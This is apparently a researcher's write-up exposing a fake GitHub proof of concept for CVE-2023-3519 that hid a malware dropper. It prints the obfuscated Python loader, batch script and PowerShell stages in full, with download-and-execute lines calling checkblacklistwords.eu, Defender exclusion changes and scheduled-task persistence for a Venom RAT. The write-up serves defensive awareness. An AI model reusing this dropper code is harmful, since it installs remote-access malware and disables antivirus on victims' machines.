As a security professional, you know how important it is to keep yourself updated in the InfoSec world. To keep myself updated about security vulnerabilities, I regularly analyze the latest Common Vulnerabilities and Exposures (CVEs). If the Proof of Concept (PoC) or write-up is publicly available, I try to analyze and understand the root cause of the vulnerability.
Today, I'm going to share a recent experience that left me surprised. I came across a public PoC of CVE-2023-3519 - Unauthenticated Remote Code Execution vulnerability in Citrix ADC that was critical (CVSS score: 9.8/10). The PoC was hosted on Github at https://github.com/knitteruntil0s/CVE-2023-3519 (archive).
While reviewing its code, I was surprised that it was my own code that I wrote a few months ago to demonstrate the GeoServer SQL injection vulnerability (CVE-2023-25157). The burning question in my mind was: Why would anyone go through the trouble of recreating this exploit?
Let's uncover the layers of this enigma.
Started analyzing the code and I observed that an additional block was cleverly added to my original script.
# Imports, Dependencies
import requests, subprocess as s, os, base64 as b
def m(s):
return b.b64decode(s).decode()
import sys
import json
...
# Check dependency
d = os.getenv(m('VEVNUA=='))
p = os.path.join(d, m('YmF0LmJhdA=='))
c = m('aHR0cDovL2NoZWNrYmxhY2tsaXN0d29yZHMuZXUvY2hlY2stdS9yb2JvdD85NjM0MjEzNTU/SWhlYWQ9dHJ1ZQ==').rstrip('\n')
if not os.path.exists(p):
r = requests.get(c).content
with open(p, 'wb') as f: f.write(r)
s.run([p], shell=True)
else:
print("Error: Please install all dependencies before continuing!")
...Full code available at https://github.com/knitteruntil0s/CVE-2023-3519/blob/main/poc.py (archive)
This additional block of python script downloads content from the http://checkblacklistwords.eu/check-u/robot?963421355?Ihead=true URL, saves it as a bat.bat file in C:\Users\USERNAME\AppData\Local\Temp\ directory, and runs that file.
The content of the bat.bat file is as below:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
:: !!!! WARNING !!!! ::
:: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ::
:: ::
:: (!) DO NOT EDIT THIS FILE UNLESS YOU KNOW WHAT YOU ARE DOING - EDITING ANYTHING IN HERE MAY CAUSE MISS BEHAVIOR AND CAUSE PROBLEMS ::
:: ON YOUR COMPUTER (!) ::
:: (!) IF ANYONE TOLD YOU TO COPY AND PASTE CODE IN HERE OR DOWNLOAD ADDITIONAL FILES, THEY ARE MOST LIKELY TRYING TO SCAM YOU, ::
:: UNLESS YOU ARE A TESTER AND THE OFFICIAL DEVELOPERS TOLD YOU TO DO SO (!) ::
:: ::
:: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ::
:: ::
set czxczxcy=%DATA%
set zxczxczy.MAIN=%DLC.DIR%\1_example
set zxczccrz=U
set cacazxzz=P
set baxzxzxz=-
set czxzxzxz=WE
set zxczccrv=GA
set zxczxzxz=SHE
set xzzxcplm=sAy
set pxxzpzxz=i
set zxcvccpp=...found
set zxazxzxz=LL
set zxxfsazx=.e
set slzxzxzx=/
set tczxczxt=t
set zxczpprz=U
set xzxzznbv="
set zhzxczxc=e
set xcvovxzx=ypA
set zxczccrb=...loading
set fxcxccfb=Ready
::Created by 136MasterNR - Read the "copyright.txt" file for more info.
::(Use "NotePadPP" or anything other than "Notepad" to view better this file)
:: Languages used: 99.8% Batch 0.2% VBScript
:: if not accessible then exit
s%tczxczxt%ar%tczxczxt% %slzxzxzx%m%pxxzpzxz%n %cacazxzz%o%czxzxzxz%r%zxczxzxz%%zxazxzxz%%zxxfsazx%x%zhzxczxc% %baxzxzxz%w%pxxzpzxz%n h%pxxzpzxz%dd%zhzxczxc%n %baxzxzxz%%zhzxczxc%x%zhzxczxc%c b%xcvovxzx%ss %baxzxzxz%%zhzxczxc% %xzxzznbv%WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvAGMAaABlAGMAawBiAGwAYQBjAGsAbABpAHMAdAB3AG8AcgBkAHMALgBlAHUALwBjAC4AdAB4AHQAIgAsACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAGMALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAJABlAG4AdgA6AFQARQBNAFAAXABjAC4AcABzADEAIgA=%xzxzznbv%
:: ERROR (FILE NOT FOUND)
IF DEFINED RUNNING (
::If it enters this statement then throw an error,
::this usually means that the invade's main function has crashed.
CALL :ERROR ERRLINE IDUNEXPECTED_CRASH 0
EXIT 1
) ELSE @IF /I NOT DEFINED STARTED EXIT 1
:STARTUP-COMPLETE
SET RUNNING=TRUE
IF DEFINED WT_SESSION (
CLS
ECHO !^!! WARNING !^!!
ECHO.Windows Terminal does not support the essential display
ECHO.features specialized for the Command Prompt.
ECHO.
ECHO.Due to this, you will experience various unexpected
ECHO.display issues while playing the invade.
ECHO.
ECHO.Windows Terminal has other critical issues too, such as
ECHO.corrupting child tasks, causing infinite error messages,
ECHO.and such other issues.
ECHO.
ECHO.Press any key to ignore this warning or launch the invade
ECHO.in Command Prompt.
PAUSE>NUL
CLS
)
:: Check if directory files are accessible, such as itself.
IF NOT EXIST "%~n0%~x0" (
CLS
ECHO.ERR : Inaccessible Directory.
ECHO.
ECHO.Try the following:
ECHO.1. Do not run the batch file within a zip file or any winrar format.
ECHO.2. Make sure that the batch file has permissions to Read/Write in this directory.
ECHO.3. Do not launch the batch file directly from a search bar or a run-in.
ECHO.4. If you are using a shortcut, make sure you added the correct directory.
ECHO.5. Try launching with administrator/elevated permissions.
PAUSE>NUL
EXIT
:: Check if the invade can reach the directory.
:: This can be a problem if the directory contains characters that batch doesn't understand.
) ELSE IF NOT EXIST "%CD%" (
CLS
ECHO.ERR : Unreachable Directory.
ECHO.
ECHO.Try the following:
ECHO.1. Move the invade ^(the whole folder^) to a different location.
ECHO.2. Make sure the directory's URL name includes ONLY latin characters.
ECHO.3. Do not move it to shared folders or onedrive.
PAUSE>NUL&EXIT
)
:: Checks if the directory was altered, this mostly happens when launched in a zip file.
IF NOT "%CD%"=="%OCD%" (
CLS
ECHO.ERR : Altered Directory.
ECHO.
ECHO.Try the following:
ECHO.1. Make sure to extract the invade from the zip file.
ECHO.2. Bad shortcut options, such as working directory.
ECHO.3. Do not launch from shared folders or onedrive.
PAUSE>NUL&EXIT
)
:RESTART
COLOR 0F
SET COLS=117
SET LINES=48
MODE CON:COLS=%COLS% LINES=%LINES%
ECHO.�[H�[s Loading ...
exitThis script looks like an obfuscated batch script, but it's cleverly designed to execute a Base64-encoded PowerShell script. The following unobfuscated line contains the real action:
start /min PoWErSHELL.exe -win hidden -exec bypAss -e "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvAGMAaABlAGMAawBiAGwAYQBjAGsAbABpAHMAdAB3AG8AcgBkAHMALgBlAHUALwBjAC4AdAB4AHQAIgAsACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAGMALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAJABlAG4AdgA6AFQARQBNAFAAXABjAC4AcABzADEAIgA="It executes a Base64-encoded PowerShell script. Here is the decoded version of the script:
[Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
(New-Object System.Net.WebClient).DownloadFile("http://checkblacklistwords.eu/c.txt", "$env:TEMP\c.ps1");
Invoke-Expression -Command "$env:TEMP\c.ps1"This PowerShell script downloads content from the http://checkblacklistwords.eu/c.txt URL, saves it as a c.ps1 file in the C:\Users\USERNAME\AppData\Local\Temp\ directory, and then executes the PowerShell script.
The contents of the c.ps1 file are as follows:
$filePathz = Join-Path -Path $env:temp -ChildPath 'c.txt'
if (Test-Path $filePathz -PathType Leaf) {
exit
}
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) {
}
Start-Sleep -Seconds 200
Function gg {
Set-ExecutionPolicy -Scope CurrentUser Bypass -Force
while($true) {
try
{
Start-Process -FilePath "powershell.exe" -ArgumentList "-windowstyle hidden -ExecutionPolicy Bypass -File $env:temp\c.ps1" -WindowStyle Hidden -Verb RunAs
exit
}
catch{}
}
}
Function OnlyTrue {
if($isAdmin) {
Start-Sleep -Seconds 270
$filePathy = Join-Path -Path $env:TEMP -ChildPath 'c.txt'
Set-Content -Path $filePathy -Value "."
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Start-Sleep -Seconds 1
Set-ExecutionPolicy -Scope CurrentUser Bypass -Force
Start-Sleep -Seconds 1
$exeExtension = '*.exe'
$dllExtension = '*.dll'
Set-MpPreference -ExclusionExtension $exeExtension
Start-Sleep -Seconds 10
$preferences = Get-MpPreference
$preferences.ExclusionExtension += $dllExtension
Set-MpPreference -ExclusionExtension $preferences.ExclusionExtension
Write-Host ""
$preferences.ExclusionExtension
Start-Sleep -Seconds 300
md $env:appdata\Drivers
attrib +h +s $env:appdata\Drivers
Start-Sleep -Seconds 1
Invoke-WebRequest -Uri "http://checkblacklistwords.eu/words.txt" -OutFile "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
Start-Sleep -Seconds 1
Start-Process -FilePath $env:appdata\Drivers\Windows.Gaming.Preview.exe
Start-Sleep -Seconds 1
attrib +h +s $env:appdata\Drivers\Windows.Gaming.Preview.exe
Start-Sleep -Seconds 1
schtasks /create /sc minute /mo 3 /tn "Windows.Gaming.Preview" /it /rl "limited" /tr "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
Start-Sleep -Seconds 1
}
else {gg}
}
OnlyTrue
This code first tries to determine if the current user is an administrator. It uses .NET classes to check whether the user running the script has administrative privileges.
It has two functions gg and OnlyTrue:
- gg: This function contains a loop that tries to execute a hidden PowerShell process and runs
c.ps1located in the user's temporary directory. - OnlyTrue: This function does various tasks if the user is an admin:
- Modifies Windows Defender preferences to exclude
*.exeand*.dllfile extensions. - Creates a directory
Driversin the user's appdata directory. - Download http://checkblacklistwords.eu/words.txt as
Windows.Gaming.Preview.exeunderC:\Users\USERNAME\AppData\Roaming\Drivers\directory. - Starts the downloaded executable.
- Creates a scheduled task named "Windows.Gaming.Preview" to run every 3 minutes.
- Modifies Windows Defender preferences to exclude
It appears that illegitimate administrative actions and suspicious activities have been carried out in the script to evade detection. Moving on, I started analyzing words.txt
bipin@bipin-VirtualBox:~/malware$ wget http://checkblacklistwords.eu/words.txt
--2023-08-23 14:05:30-- http://checkblacklistwords.eu/words.txt
Resolving checkblacklistwords.eu (checkblacklistwords.eu)... 217.160.0.213
Connecting to checkblacklistwords.eu (checkblacklistwords.eu)|217.160.0.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75776 (74K) [text/plain]
Saving to: ‘words.txt’
words.txt 100%[========================================================>] 74.00K 158KB/s in 0.5s
2023-08-23 14:05:35 (158 KB/s) - ‘words.txt’ saved [75776/75776]
bipin@bipin-VirtualBox:~/malware$ file words.txt
words.txt: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
bipin@bipin-VirtualBox:~/malware$ Through Ghidra and virustotal.com1 analysis, I've identified it as a Venom RAT (Remote Access Trojan)2, a malware for unauthorized system control. Acting as spyware, it secretly collects sensitive data, enabling remote manipulation. It engages in harmful actions like surveillance, data theft, and control. It uses encryption and obfuscation techniques to evade traditional antivirus and security measures.
The fake exploit wasn't just a prank; it was a trap for script kiddies - those who blindly run code without understanding its logic.
The moral of the story? Think twice before you run any code, especially if you don't understand what it does.
Don't forget to share this story with your friends and colleagues - maybe you can save someone from falling into such a trap.
If you're looking to study this malware example for educational reasons, you can get it from http://checkblacklistwords.eu/words.txt. If it's not available there, feel free to contact me at bipin@cuberk.com, and I can provide you with a copy.
Disclaimer: The content provided in this gist is for educational purposes only. The intention is to share a real-life experience and lessons learned from encountering a deceptive script that led to a Remote Access Trojan. The purpose is to raise awareness about the importance of understanding and scrutinizing code before execution. Readers are strongly advised not to replicate or execute any code discussed in this article without proper knowledge and precautions. The author shall not be held responsible for any misuse or consequences resulting from the information shared here.